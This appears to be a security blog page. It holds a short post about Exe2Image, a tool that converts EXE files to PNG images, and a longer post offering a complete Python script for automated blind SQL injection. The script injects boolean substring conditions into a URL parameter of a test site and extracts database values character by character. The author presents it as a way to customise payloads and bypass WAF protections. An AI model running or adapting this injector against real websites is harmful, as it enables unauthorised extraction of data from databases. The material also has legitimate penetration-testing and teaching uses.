Exe2Image

This is A simple utility to convert EXE files to PNG images and vice versa. This is written using Java 8. Inspired by this article.

Putty.exe converted to an image using green pixels.

Download:
https://github.com/OsandaMalith/Exe2Image/releases

This tool was added to PentestBox : https://modules.pentestbox.com/#forensics

Advertisements

Automated Blind SQL Injector

There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.

This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py

import urllib2
import re

# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/

url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
    for j in range(32, 127):
        if(chr(j).isupper()):
            continue
        sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
        target = url + sql
        req = urllib2.Request(target)
        # If cookies exists
        # req.add_header('Cookie','value=1;value=2')
        page = urllib2.urlopen(req)
        html = page.read()

        try:
            re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
            print ('Found: ' + chr(j))
            result += chr(j)
        except:
            pass

print (result)

Continue reading